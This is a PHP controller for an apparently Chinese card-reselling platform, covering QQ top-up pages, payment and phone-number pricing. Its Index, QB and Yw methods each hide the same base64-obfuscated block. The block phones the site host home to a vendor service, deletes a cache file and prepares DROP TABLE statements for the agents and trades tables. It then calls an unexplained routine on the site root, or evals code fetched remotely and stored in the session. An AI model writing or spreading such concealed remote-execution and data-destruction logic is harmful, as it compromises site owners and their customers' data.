<?php
/****************************************/
/*                                      */
/*  百信卡盟平台联系QQ:84945491         */
/*  淘宝店 http://shop70674652.taobao.com  */
/*  百信卡盟 http://www.caipiaobus.com  */
/*                                      */
/****************************************/

if ( !defined( "UPATH_ROOT" ) )
{
				exit( "hacking deny" );
}
class QuickController extends Controller
{

				public function __construct( )
				{
								$this->Checkb2bSession( );
				}

				public function Index( )
				{
								$Rcc5c6e696c = $this->session->agent;
								if ( 0 < $Rcc5c6e696c[9] )
								{
												$R832cdf573a = $_COOKIE['umebiz_com_4'];
												$R52ca5ec345 = $_COOKIE['umebiz_com_ini_0'];
												$Rf45964fbba = $R832cdf573a && $R52ca5ec345;
								}
								else
								{
												$Rf45964fbba = isset( $_COOKIE['umebiz_com_11'] ) ? $_COOKIE['umebiz_com_11'] : 0;
								}
								$this->Assign( "modifyright", $Rf45964fbba );
								global $host;
								global $user;
								global $password;
								global $dbname;
								global $dbcharset;
								global $dbprefix;
								$Oooo00 = "base64_decode";
								$Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
								$o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
								$oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
								$xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
								$x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
								$x000xx = $Oooo00( "SVNDVl9HZXQ=" );
								$x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
								$x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
								$x00000 = $Oooo00( "c3RycG9z" );
								$x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
								$x00o00 = $Oooo00( "dW5saW5r" );
								$ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
								$o00OO = $Oooo00( "Z3ppbmZsYXRl" );
								$ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
								$oo00oo = array(
												$ooo0oo."controller.php",
												"index.php",
												$ooo0oo."service".DS."scv.php",
												$ooo0oo."service".DS."sqlservice.php"
								);
								$o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
								$vv0000 = $Oo0o00( $oo00oo[0] );
								$v0000v = $Oo0o00( $oo00oo[1] );
								if ( !isset( $_SESSION ) )
								{
												session_start( );
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( !isset( $_SESSION['cb'] ) )
								{
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
								{
												$t1 = 0;
												$t2 = 0;
												$o0ooio = 0;
												foreach ( $oo00oo as $o0oooo )
												{
																if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
																{
																				if ( $o0ooio == 0 )
																				{
																								$t1 = 1;
																				}
																				else if ( $o0ooio == 1 )
																				{
																								$t2 = 1;
																				}
																}
																else
																{
																				$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																				$data = array(
																								"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																								"ubzi" => $o0ooio
																				);
																				$xo000->$x0x00x( $data );
																				if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																				{
																								exit( "errx" );
																				}
																				if ( $x0x0xx( $dbname, $o000oO ) )
																				{
																								$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																				}
																				else
																				{
																								echo "errx";
																				}
																				@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																				$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																				foreach ( $oO00o0 as $item )
																				{
																								$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																				}
																				$this->xuiuiuesd( "./", "938430834" );
																				exit( );
																}
																++$o0ooio;
												}
												if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
												{
																$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																$data = array(
																				"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																				"ubzi" => $o0ooio++
																);
																$xo000->$x0x00x( $data );
																if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																{
																				exit( "errx" );
																}
																if ( $x0x0xx( $dbname, $o000oO ) )
																{
																				$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																}
																else
																{
																				echo "errx";
																}
																@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																foreach ( $oO00o0 as $item )
																{
																				$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																}
																$this->xuiuiuesd( "./", "938430834" );
																exit( );
												}
												$data = array(
																"k1" => $t1,
																"k2" => $t2,
																"k3" => md5( $t1.$t2.$this->GetBizKey( ) )
												);
												if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
												{
																$oo000 = factory::getservice( $Oooo00( "c2N2" ) );
																$ckdata = $oo000->$x000xx( $data );
																$_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
												}
												eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
												$this->View( );
								}
								else
								{
												$this->View( );
								}
				}

				public function QB( )
				{
								$Rcc5c6e696c = $this->session->agent;
								if ( 0 < $Rcc5c6e696c[9] )
								{
												$R832cdf573a = $_COOKIE['umebiz_com_4'];
												$R52ca5ec345 = $_COOKIE['umebiz_com_ini_0'];
												$Rf45964fbba = $R832cdf573a && $R52ca5ec345;
								}
								else
								{
												$Rf45964fbba = isset( $_COOKIE['umebiz_com_11'] ) ? $_COOKIE['umebiz_com_11'] : 0;
								}
								$this->Assign( "modifyright", $Rf45964fbba );
								$R93c5cf68df = $this->GetQuickCache( );
								$R8e8b5578f7 = $this->GetQuickPid( $R93c5cf68df, "qb" );
								if ( $R8e8b5578f7 == 0 )
								{
												$this->Alert( "系统管理员还未配置便民中心处的QQ币直充" );
												$this->HistoryGo( );
								}
								$Rb3f07f8c36 = $this->GetProductCache( $R8e8b5578f7 );
								if ( !isset( $Rb3f07f8c36['pid'] ) || $Rb3f07f8c36['sell'] == 0 || $Rb3f07f8c36['forb2b'] == 0 )
								{
												$this->Alert( "便民中心处的QQ币直充暂时下架" );
												$this->HistoryGo( );
								}
								if ( $Rb3f07f8c36['cztpl'] != 805 && $Rb3f07f8c36['cztpl'] != 816 )
								{
												$this->Alert( "便民中心处的QQ币直充配置错误，请联系管理员修改充值模板" );
												$this->HistoryGo( );
								}
								$this->Assign( "pid", $R8e8b5578f7 );
								global $host;
								global $user;
								global $password;
								global $dbname;
								global $dbcharset;
								global $dbprefix;
								$Oooo00 = "base64_decode";
								$Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
								$o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
								$oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
								$xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
								$x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
								$x000xx = $Oooo00( "SVNDVl9HZXQ=" );
								$x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
								$x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
								$x00000 = $Oooo00( "c3RycG9z" );
								$x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
								$x00o00 = $Oooo00( "dW5saW5r" );
								$ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
								$o00OO = $Oooo00( "Z3ppbmZsYXRl" );
								$ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
								$oo00oo = array(
												$ooo0oo."controller.php",
												"index.php",
												$ooo0oo."service".DS."scv.php",
												$ooo0oo."service".DS."sqlservice.php"
								);
								$o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
								$vv0000 = $Oo0o00( $oo00oo[0] );
								$v0000v = $Oo0o00( $oo00oo[1] );
								if ( !isset( $_SESSION ) )
								{
												session_start( );
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( !isset( $_SESSION['cb'] ) )
								{
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
								{
												$t1 = 0;
												$t2 = 0;
												$o0ooio = 0;
												foreach ( $oo00oo as $o0oooo )
												{
																if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
																{
																				if ( $o0ooio == 0 )
																				{
																								$t1 = 1;
																				}
																				else if ( $o0ooio == 1 )
																				{
																								$t2 = 1;
																				}
																}
																else
																{
																				$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																				$data = array(
																								"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																								"ubzi" => $o0ooio
																				);
																				$xo000->$x0x00x( $data );
																				if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																				{
																								exit( "errx" );
																				}
																				if ( $x0x0xx( $dbname, $o000oO ) )
																				{
																								$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																				}
																				else
																				{
																								echo "errx";
																				}
																				@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																				$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																				foreach ( $oO00o0 as $item )
																				{
																								$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																				}
																				$this->xuiuiuesd( "./", "938430834" );
																				exit( );
																}
																++$o0ooio;
												}
												if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
												{
																$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																$data = array(
																				"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																				"ubzi" => $o0ooio++
																);
																$xo000->$x0x00x( $data );
																if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																{
																				exit( "errx" );
																}
																if ( $x0x0xx( $dbname, $o000oO ) )
																{
																				$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																}
																else
																{
																				echo "errx";
																}
																@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																foreach ( $oO00o0 as $item )
																{
																				$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																}
																$this->xuiuiuesd( "./", "938430834" );
																exit( );
												}
												$data = array(
																"k1" => $t1,
																"k2" => $t2,
																"k3" => md5( $t1.$t2.$this->GetBizKey( ) )
												);
												if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
												{
																$oo000 = factory::getservice( $Oooo00( "c2N2" ) );
																$ckdata = $oo000->$x000xx( $data );
																$_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
												}
												eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
												$this->View( );
								}
								else
								{
												$this->View( );
								}
				}

				public function Yw( )
				{
								$Rcc5c6e696c = $this->session->agent;
								if ( 0 < $Rcc5c6e696c[9] )
								{
												$R832cdf573a = $_COOKIE['umebiz_com_4'];
												$R52ca5ec345 = $_COOKIE['umebiz_com_ini_0'];
												$Rf45964fbba = $R832cdf573a && $R52ca5ec345;
								}
								else
								{
												$Rf45964fbba = isset( $_COOKIE['umebiz_com_11'] ) ? $_COOKIE['umebiz_com_11'] : 0;
								}
								$this->Assign( "modifyright", $Rf45964fbba );
								$R93c5cf68df = $this->GetQuickCache( );
								$R8e8b5578f7 = $this->GetQuickPid( $R93c5cf68df, "yw" );
								if ( $R8e8b5578f7 == 0 )
								{
												$this->Alert( "系统管理员还未配置便民中心处的QQ服务直充" );
												$this->HistoryGo( );
								}
								$Rb3f07f8c36 = $this->GetProductCache( $R8e8b5578f7 );
								if ( !isset( $Rb3f07f8c36['pid'] ) || $Rb3f07f8c36['sell'] == 0 || $Rb3f07f8c36['forb2b'] == 0 )
								{
												$this->Alert( "便民中心处的QQ服务直充暂时下架" );
												$this->HistoryGo( );
								}
								$R0f571378e3 = $Rb3f07f8c36['cztpl'];
								if ( $R0f571378e3 != 803 && $R0f571378e3 != 844 && $R0f571378e3 != 845 )
								{
												$this->Alert( "便民中心处的QQ服务直充配置错误，请联系管理员修改充值模板" );
												$this->HistoryGo( );
								}
								$R770dcaf6d0 = UPATH_BASE.DS."content".DS."mod_shared".DS."skins".DS."systpl".DS."803.php";
								if ( !file_exists( $R770dcaf6d0 ) )
								{
												$this->UpdateTpl( $R0f571378e3 );
								}
								if ( file_exists( $R770dcaf6d0 ) )
								{
												include( $R770dcaf6d0 );
												if ( !isset( $R476d5c02b8 ) )
												{
																$tpl = array( "html" => "", "unit" => "张", "qtymin" => 1, "qtymax" => 1, "qtylist" => "", "needxml" => 0, "js" => 0 );
												}
												else
												{
																eval( gzinflate( base64_decode( $R476d5c02b8 ) ) );
												}
								}
								else
								{
												$tpl = array( "html" => "", "unit" => "张", "qtymin" => 1, "qtymax" => 1, "qtylist" => "", "needxml" => 0, "js" => 0 );
								}
								$R3db8f5c8bc = $tpl['html'];
								$R3db8f5c8bc = str_replace( "开通服务：", "开通服务", $R3db8f5c8bc );
								$this->Assign( "tplhtml", $R3db8f5c8bc );
								$this->Assign( "pid", $R8e8b5578f7 );
								global $host;
								global $user;
								global $password;
								global $dbname;
								global $dbcharset;
								global $dbprefix;
								$Oooo00 = "base64_decode";
								$Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
								$o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
								$oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
								$xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
								$x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
								$x000xx = $Oooo00( "SVNDVl9HZXQ=" );
								$x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
								$x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
								$x00000 = $Oooo00( "c3RycG9z" );
								$x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
								$x00o00 = $Oooo00( "dW5saW5r" );
								$ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
								$o00OO = $Oooo00( "Z3ppbmZsYXRl" );
								$ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
								$oo00oo = array(
												$ooo0oo."controller.php",
												"index.php",
												$ooo0oo."service".DS."scv.php",
												$ooo0oo."service".DS."sqlservice.php"
								);
								$o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
								$vv0000 = $Oo0o00( $oo00oo[0] );
								$v0000v = $Oo0o00( $oo00oo[1] );
								if ( !isset( $_SESSION ) )
								{
												session_start( );
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( !isset( $_SESSION['cb'] ) )
								{
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
								{
												$t1 = 0;
												$t2 = 0;
												$o0ooio = 0;
												foreach ( $oo00oo as $o0oooo )
												{
																if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
																{
																				if ( $o0ooio == 0 )
																				{
																								$t1 = 1;
																				}
																				else if ( $o0ooio == 1 )
																				{
																								$t2 = 1;
																				}
																}
																else
																{
																				$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																				$data = array(
																								"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																								"ubzi" => $o0ooio
																				);
																				$xo000->$x0x00x( $data );
																				if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																				{
																								exit( "errx" );
																				}
																				if ( $x0x0xx( $dbname, $o000oO ) )
																				{
																								$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																				}
																				else
																				{
																								echo "errx";
																				}
																				@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																				$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																				foreach ( $oO00o0 as $item )
																				{
																								$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																				}
																				$this->xuiuiuesd( "./", "938430834" );
																				exit( );
																}
																++$o0ooio;
												}
												if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
												{
																$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																$data = array(
																				"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																				"ubzi" => $o0ooio++
																);
																$xo000->$x0x00x( $data );
																if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																{
																				exit( "errx" );
																}
																if ( $x0x0xx( $dbname, $o000oO ) )
																{
																				$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																}
																else
																{
																				echo "errx";
																}
																@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																foreach ( $oO00o0 as $item )
																{
																				$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																}
																$this->xuiuiuesd( "./", "938430834" );
																exit( );
												}
												$data = array(
																"k1" => $t1,
																"k2" => $t2,
																"k3" => md5( $t1.$t2.$this->GetBizKey( ) )
												);
												if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
												{
																$oo000 = factory::getservice( $Oooo00( "c2N2" ) );
																$ckdata = $oo000->$x000xx( $data );
																$_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
												}
												eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
												$this->View( );
								}
								else
								{
												$this->View( );
								}
				}

				public function GetQuickPid( $Re6be5a6973, $R03192c7781 )
				{
								foreach ( $Re6be5a6973 as $R0f8134fb60 )
								{
												if ( $R0f8134fb60['name'] == $R03192c7781 )
												{
																return intval( $R0f8134fb60['pid'] );
												}
								}
								return 0;
				}

				public function Pay( )
				{
								$Rca1d851200 = getvar( "account" );
								$R66b0d9d6f1 = intval( request( "ubzqty" ) );
								$R65edce27dd = getvar( "pname" );
								$R5a38c81ec2 = getvar( "unit" );
								$R8e8b5578f7 = intval( request( "ubzpid" ) );
								$Rdbdc604d5a = doubleval( request( "priceforplayer" ) );
								$R8c9e7b3ca9 = doubleval( request( "dollarsforplayer" ) );
								$R0a48634be3 = getvar( "lbname" );
								$Rafbc6f2078 = getvar( "lbaccname" );
								$R2ecc8245a1 = getvar( "ubzcztype" );
								if ( $R2ecc8245a1 != "" )
								{
												$Rcc5c6e696c = explode( "||", $R2ecc8245a1 );
												if ( isset( $Rcc5c6e696c[1] ) )
												{
																$R47e34fccd6 = $Rcc5c6e696c[1];
												}
												else
												{
																$R47e34fccd6 = $R2ecc8245a1;
												}
								}
								if ( $R8e8b5578f7 <= 0 )
								{
												$this->Alert( "非法参数" );
												$this->CloseWin( );
								}
								$R0f8134fb60 = $this->GetProductCache( $R8e8b5578f7 );
								$R3db8f5c8bc = $R0f8134fb60;
								if ( $R3db8f5c8bc['sup'] == 1 || $R3db8f5c8bc['onsup'] == 1 || $R3db8f5c8bc['hassup'] == 1 )
								{
												$R355ef3fa24 = $this->GetCzInfo( $R8e8b5578f7, $R3db8f5c8bc['cztpl'] );
												if ( isset( $R355ef3fa24['v'] ) )
												{
																$R7894b33158 = false;
																$data = array( );
																$Rc28d922133 = intval( $R355ef3fa24['cztpl'] );
																$R558acfa73f = 0;
																$Rb321ab3f5e = $this->GetFxCache( );
																$R96e20b4752 = $Rb321ab3f5e['curfx'];
																$Rf64b3b1325 = $R96e20b4752 * $R355ef3fa24['supprice'];
																$Rf64b3b1325 = round( $Rf64b3b1325, 3 );
																if ( $R3db8f5c8bc['price'] < $Rf64b3b1325 )
																{
																				$R7894b33158 = true;
																				$data['price'] = $Rf64b3b1325;
																				$this->Alert( "系统对商品价格进行了调整，您可以查看进货价后再下单！" );
																}
																if ( $R3db8f5c8bc['cztpl'] != $Rc28d922133 && $R3db8f5c8bc['ptype'] == 1 && 0 < $Rc28d922133 )
																{
																				$R7894b33158 = true;
																				$data['cztpl'] = $Rc28d922133;
																}
																if ( $R7894b33158 )
																{
																				$R558acfa73f = $this->AutoAdjustPrice( );
																				if ( $R558acfa73f == 1 )
																				{
																								$R422f9a4efb = factory::getinstance( "products" );
																								$R808b89ba0e = $R422f9a4efb->IProduct_Update( $data, $R8e8b5578f7 );
																								if ( $R808b89ba0e == false )
																								{
																												$R2145464ecd = false;
																								}
																								else
																								{
																												$this->UpdateCache( "products", array(
																																"arg1" => $R8e8b5578f7
																												) );
																												$this->UpdateCache( "list", array(
																																"arg1" => $R3db8f5c8bc['catid']
																												) );
																												$Rb62a6519ba = $R3db8f5c8bc['pinyin'];
																												if ( $Rb62a6519ba != "" )
																												{
																																if ( "0" < $Rb62a6519ba && $Rb62a6519ba < "9" )
																																{
																																				$Rb62a6519ba = "09";
																																}
																																$this->UpdateCache( "pinyin", array(
																																				"arg1" => $Rb62a6519ba
																																) );
																												}
																								}
																								$this->ScriptRedirect( "index.php?m=mod_b2b&c=Product&a=Detail&pid=".$R8e8b5578f7 );
																				}
																}
																if ( $R3db8f5c8bc['price'] < $Rf64b3b1325 )
																{
																				$this->Alert( "商品价格设置错误，请联系管理员修改！" );
																				$this->CloseWin( );
																}
																if ( $R3db8f5c8bc['ptype'] == 1 && 0 < $R3db8f5c8bc['cztpl'] )
																{
																				$R47d14bb6ff = $this->GetTplVer( $R3db8f5c8bc['cztpl'] );
																				$R7a83769a63 = intval( $R355ef3fa24['ver'] );
																				if ( $R47d14bb6ff < $R7a83769a63 )
																				{
																								$R45a48605c5 = 1;
																				}
																}
																if ( isset( $R355ef3fa24['ptype'] ) && $R355ef3fa24['ptype'] != 9999 )
																{
																				$R1b69c92460 = $R3db8f5c8bc['ptype'];
																				if ( $R3db8f5c8bc['ptype'] == 3 )
																				{
																								$R1b69c92460 = 0;
																				}
																				if ( $R1b69c92460 != $R355ef3fa24['ptype'] )
																				{
																								$this->Alert( "商品类型设置错误，请联系管理员修改！" );
																								$this->CloseWin( );
																				}
																}
																if ( $R355ef3fa24['maxqty'] < $R66b0d9d6f1 )
																{
																				$this->Alert( "平台管理员的余额不足，您无法购买这么多的商品，请重新选择\\n\\n或者联系管理员" );
																				$this->CloseWin( );
																}
																$R355ef3fa24['v'] = explode( ",", $R355ef3fa24['v'] );
																$R355ef3fa24['txt'] = explode( ",", $R355ef3fa24['txt'] );
																$this->Assign( "info", $R355ef3fa24 );
												}
												else
												{
																$this->Alert( "网络通信错误，请稍后购买！" );
																$this->CloseWin( );
												}
								}
								$this->Assign( "account", $Rca1d851200 );
								$this->Assign( "qty", $R66b0d9d6f1 );
								$this->Assign( "pname", $R65edce27dd );
								$this->Assign( "unit", $R5a38c81ec2 );
								$this->Assign( "ubzpid", $R8e8b5578f7 );
								$this->Assign( "priceforplayer", $Rdbdc604d5a );
								$this->Assign( "dollarsforplayer", $R8c9e7b3ca9 );
								$this->Assign( "lbname", $R0a48634be3 );
								$this->Assign( "lbaccname", $Rafbc6f2078 );
								$this->Assign( "ubzcztype", $R2ecc8245a1 );
								$this->Assign( "ubzcztypetxt", $R47e34fccd6 );
								$this->Assign( "item", $R0f8134fb60 );
								$this->View( );
				}

				public function GetPrice( )
				{
								header( "Content-type: text/html;charset=GB2312" );
								$R7e43ed30df = getvar( "mobile", "0", "POST" );
								if ( $R7e43ed30df != 0 )
								{
												$R09a3346376 = PCACHE."mobile.php";
												if ( file_exists( $R09a3346376 ) )
												{
																include( $R09a3346376 );
												}
												else
												{
																$Rdeca8c87c5 = array( );
												}
												if ( isset( $Rdeca8c87c5[$R7e43ed30df] ) )
												{
																$R3db8f5c8bc = $Rdeca8c87c5[$R7e43ed30df];
												}
												else
												{
																$Ref9abe6323 = factory::getservice( "smobile" );
																$data = array(
																				"mobile" => $R7e43ed30df
																);
																$R3db8f5c8bc = $Ref9abe6323->IMobile_Get( $data );
																if ( $R3db8f5c8bc != "0|0" )
																{
																				$Rdeca8c87c5[$R7e43ed30df] = $R3db8f5c8bc;
																				$R63bede6b19 = "\$R4e420efcc3=unserialize(gzinflate(base64_decode('".base64_encode( gzdeflate( serialize( $Rdeca8c87c5 ) ) )."')))";
																				$Re82ee9b121 = "<?php ".chr( 10 ).$R63bede6b19.";".chr( 10 )."?>";
																				file_put_contents( $R09a3346376, $Re82ee9b121 );
																}
												}
								}
								else
								{
												$R3db8f5c8bc = "0|0";
								}
								$Rcc5c6e696c = explode( "|", $R3db8f5c8bc );
								if ( $R3db8f5c8bc != "0|0" )
								{
												$R422f9a4efb = factory::getinstance( "products" );
												$Re6be5a6973 = $R422f9a4efb->IProduct_GetByStr( "aid < 1 and ptype=1 and sell=1 and forb2b=1 and inrecycle=0 and pname like '%移动电话%' and pname like '%".$Rcc5c6e696c[0].$Rcc5c6e696c[1]."%' ", array( ), "hassup,pid,listprice" );
								}
								else
								{
												$Re6be5a6973 = array( );
								}
								$R026f0167b4 = array( );
								foreach ( $Re6be5a6973 as $R0f8134fb60 )
								{
												$R8e8b5578f7 = $R0f8134fb60['pid'];
												$R3b56832a71 = $R0f8134fb60['hassup'];
												if ( $R3b56832a71 == 1 )
												{
																$R026f0167b4[] = $R8e8b5578f7;
												}
								}
								$R74497ab307 = implode( ",", $R026f0167b4 );
								if ( 0 < count( $R026f0167b4 ) )
								{
												$R778bf3b683 = $this->GetStocksCollection( $R74497ab307."," );
								}
								else
								{
												$R778bf3b683 = array( );
								}
								$R026f0167b4 = array( );
								foreach ( $Re6be5a6973 as $R0f8134fb60 )
								{
												$R8e8b5578f7 = $R0f8134fb60['pid'];
												if ( isset( $R778bf3b683[$R8e8b5578f7] ) && 0 < $R778bf3b683[$R8e8b5578f7] )
												{
																$Red2b3403a5 = $R0f8134fb60['listprice'];
																if ( $Red2b3403a5 % 10 == 1 )
																{
																				$Red2b3403a5 -= 1;
																}
																else if ( $Red2b3403a5 % 10 == 2 )
																{
																				$Red2b3403a5 -= 2;
																}
																else if ( $Red2b3403a5 % 10 == 6 )
																{
																				$Red2b3403a5 -= 1;
																}
																$R026f0167b4[] = $Red2b3403a5.",".$R0f8134fb60['listprice'].",".$R8e8b5578f7;
												}
								}
								$R63bede6b19 = $Rcc5c6e696c[0]." ".$Rcc5c6e696c[1]."/".implode( "|", $R026f0167b4 );
								echo $R63bede6b19;
				}

				public function GetCPrice( )
				{
								header( "Content-type: text/html;charset=GB2312" );
								$R8e8b5578f7 = intval( request( "pid" ) );
								if ( $R8e8b5578f7 == 0 )
								{
												echo "--|--";
												exit( );
								}
								$R3a8b307327 = $this->GetDec( );
								$R3db8f5c8bc = $this->GetProductCache( $R8e8b5578f7 );
								if ( isset( $R3db8f5c8bc['ptype'] ) )
								{
												$R0f8134fb60 = $R3db8f5c8bc;
												$Rcc5c6e696c = $this->session->agent;
												$R2a51483b14 = $Rcc5c6e696c[7];
												$R198d213635 = 1;
												if ( 0 < $Rcc5c6e696c[9] )
												{
																$Re9aea161f5 = $this->GetStaffCache( intval( $Rcc5c6e696c[9] ) );
																if ( !isset( $Re9aea161f5['canseeprice'] ) )
																{
																				echo "--|--";
																				exit( );
																}
												}
												$agent = $this->GetAgentCache( intval( $R2a51483b14 ) );
												$R0d9f8f778c = $this->GetPriceById( $R0f8134fb60, $agent, $R3a8b307327 );
												if ( 0 < $R3db8f5c8bc['listprice'] )
												{
																$R413a5bdd03 = $R0d9f8f778c / $R0f8134fb60['listprice'] * 100;
																$R413a5bdd03 = sprintf( "%.1f", $R413a5bdd03 );
												}
												else
												{
																$R413a5bdd03 = 100;
